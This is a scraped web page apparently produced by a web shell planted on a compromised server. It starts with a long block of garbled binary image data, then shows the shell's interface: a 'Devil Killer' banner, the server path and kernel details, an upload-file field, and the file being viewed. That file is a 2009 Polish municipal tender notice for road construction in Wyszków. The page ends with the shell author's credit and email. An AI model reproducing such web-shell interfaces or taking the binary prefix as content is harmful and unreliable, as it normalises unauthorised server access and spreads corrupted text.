JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090818/135469-N-2009.html

<p class="kh_header"><b>Wyszków: Budowa ulicy Żytniej wraz z drogą gminną Wyszków-Sitno - etap I</b><br>
<b>Numer ogłoszenia: 135469 - 2009; data zamieszczenia: 18.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wyszków , Aleja Róż 2, 07-200 Wyszków, woj. mazowieckie, tel. 029 7424201, faks 029 7424209.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa ulicy Żytniej wraz z drogą gminną Wyszków-Sitno - etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> BUDOWA ULICY ŻYTNIEJ WRAZ Z DROGĄ GMINNĄ WYSZKÓW SITNO - ETAP I
w tym, m.in.
1.	Droga o kategorii ruchu KR2 - szer. 5,5 m; dł. 3.381,18 m o konstrukcji:
1.	Warstwa wzmocnionego podłoża z kruszywa stabilizowanego cementem  o Rm = 2,5 MPa - gr. 15 cm (pow. 22.377,85 m2)
2.	Warstwa odcinająca z kruszywa naturalnego zagęszczana mechanicznie o gr. 11 cm   (pow. 19.951,14 m2) 
3.	Podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 mm - gr. 15 cm (pow. 19.951,14 m2)
4.	Podbudowa zasadnicza z betonu asfaltowego 0/20,0 mm - gr. 9 cm (pow. 19.951,14 m2)
5.	Warstwa ścieralna z betonu asfaltowego 0/12,8 mm - gr. 5 cm (pow. 19.951,14 m2)
2.	Ukształtowanie wysokościowe jezdni:
- pochylenia niwelet jezdni: 0,05 %÷ 2,33 %
      - spadki poprzeczne jezdni - jednostronne 2%, na łukach poziomych spadek jednostronny - jak na odcinku prostym
3.	Krawężniki:
- betonowy 20x30 cm od strony chodnika, na ławie betonowej z oporem - dł. 3.370,17 mb 
- betonowy wtopiony15 x 25 cm z  oporem na ławie betonowej - dł. 3.510,09 mb
4.	Ściek uliczny:
- z kostki brukowej betonowej o gr. 6 cm - dł. 43,07 mb, szer. 20 cm
- z kostki brukowej betonowej o gr. 8 cm - dł. 43,07 mb, szer. 10 cm
- skarpowy z prefabrykowanych elementów betonowych - dł. 6 m
5.	Miejsca parkingowe:
- Warstwa wzmocnionego podłoża z kruszywa stabilizowanego cementem o Rm = 1,5 MPa - gr. 15 cm (pow. 238,42 m2)
- Warstwa odcinająca z kruszywa naturalnego zagęszczonego mechanicznie gr. 14 cm - (pow. 238,42 m2)
- Podbudowa z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 mm - gr. 15 cm (pow. 238,42 m2)
- nawierzchnia z kostki brukowej betonowej gr. 8 cm (kolor) na podsypce cementowo - piaskowej gr. 3 cm - (pow.238,42 m2)
6.	Wyspy:
- o nawierzchni z brukowej kostki betonowej - gr. 6 cm na podsypce  piaskowej gr. 3 cm - pow. 28,88 m2
7.	Pobocza gruntowe wzmocnione o szerokości 0,75 m i spadku  poprzecznym 8% jednostronne od strony rowu
8.	Odwodnienie powierzchniowe do rowów otwartych odparowywanych o przekroju trapezowym
9.	Przepusty:
	O 600 - 2 szt.
	O 400 - 65 szt.
10.	Urządzenia bezpieczeństwa ruchu - w rejonie wlotów  przepustów po stronie chodnika  na poboczu - bariery łańcuchowe - dł. 12 m
11.	Znaki drogowe - 40 szt.
12.	Oznakowanie poziome jezdni farbą chemoutrwaldzalną - linie segregacyjne i krawędziowe ciągłe malowane mechanicznie - pow. 280 m2
13.	Rurociąg tłoczny PE O 110 x 6,3 mm - dł. 1246 mb
14.	Przebudowa kolizji sieci i urządzeń elektrycznych
15.	Wycinka drzew - 114 szt.
2.  Szczegółowy zakres robót określa dokumentacja projektowa..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.11.10.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 40 000 zł (czterdzieści tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielnie zamówienia mogą ubiegać się Wykonawcy, którzy 
a)   posiadają uprawnienia do wykonywania działalności w zakresie objętym przedmiotem zamówienia tzn. prowadzą działalność gospodarczą w w/w zakresie zarejestrowaną   w Krajowym Rejestrze Sądowym lub innym organie ewidencji działalności gospodarczej,
b)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z uwagi na okoliczności wskazane przepisami art. 24 ust. 1 oraz ust. 2 pkt. 1 ustawy Prawo zamówień publicznych,
c)	 posiadają niezbędną wiedzę i doświadczenie, tj. wykonali (rozpoczęli i zakończyli budowę) samodzielnie lub z udziałem podwykonawców w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 zadania  o podobnym charakterze i złożoności tj. polegających na wykonaniu minimum:
1)	20 000 m2 drogi o konstrukcji wymienionej w opisie przedmiotu zamówienia w ramach jednego zadania.
d)	dysponują potencjałem technicznym niezbędnym do wykonania zamówienia tj.  co najmniej:
1.	koparka - 1szt., 
2.	spycharka - 1szt., 
3.	równiarka - 1 szt.
4.	ładowarka - 1 szt
5.	samochód samowyładowczy - 1szt.,
6.	samochód dostawczy 1 szt.
7.	zagęszczarka,
8.	rozściełacz do mas bitumicznych,
9.	walec samojezdny,
e)	dysponują personelem kierowniczym, który będzie uczestniczyć w realizacji zamówienia, tj. posiadającym uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie  w specjalności drogowej, sanitarnej, elektrycznej.
f)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

I.	Ocena spełniania w/w warunków zostanie przeprowadzona według formuły spełnia - nie spełnia, wyłącznie na podstawie oświadczeń i dokumentów wymienionych w § 6. SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił. Uzupełnienie wymaganych dokumentów nastąpi na wezwanie Zamawiającego   w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlegałaby odrzuceniu lub konieczne byłoby unieważnienie postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> I.  Wykonawcy dostarczą: 
1.	Wypełniony formularz oferty (według załączonego wzoru),
2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych Formularz nr 1,
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS, potwierdzonych odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem składania ofert.
6.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24                     ust. 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Kosztorys ofertowy sporządzony zgodnie z § 12.
8.	Wykaz wykonanych robót budowlanych w okresie pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie - odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (rozpoczętych i zakończonych) oraz dokumenty, że wykazane roboty zostały wykonane  należycie. Formularz Nr 2.
9.	Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował Wykonawca lub pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego niezbędnego do wykonania zamówienia, jeżeli Wykonawca wskazał potencjał, którym będzie dysponował Formularz Nr 4.
10.	Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli Wykonawca wskazał osoby, którymi będzie dysponował  Formularz Nr 3. Do wykazanych osób należy dołączyć informację, że osoby te posiadają wymagane uprawnienia do pełnienia samodzielnej funkcji technicznej we właściwej specjalności. Osoby te muszą posiadać aktualne zaświadczenie  o przynależności do Okręgowej Izby Inżynierów  Budownictwa. 
11.	Informacja o Podwykonawcach Formularz Nr 5
12.	 Dowód wniesienia wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wyszkow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wyszkowie
ul. Aleja Róż 2, 07-200 Wyszków
pok. 116A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.09.2009 godzina 11:00, miejsce: Urząd Miejski w Wyszkowie
ul. Aleja Róż 2, 07-200 Wyszków
Sekretariat Burmistrza pok. 139.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com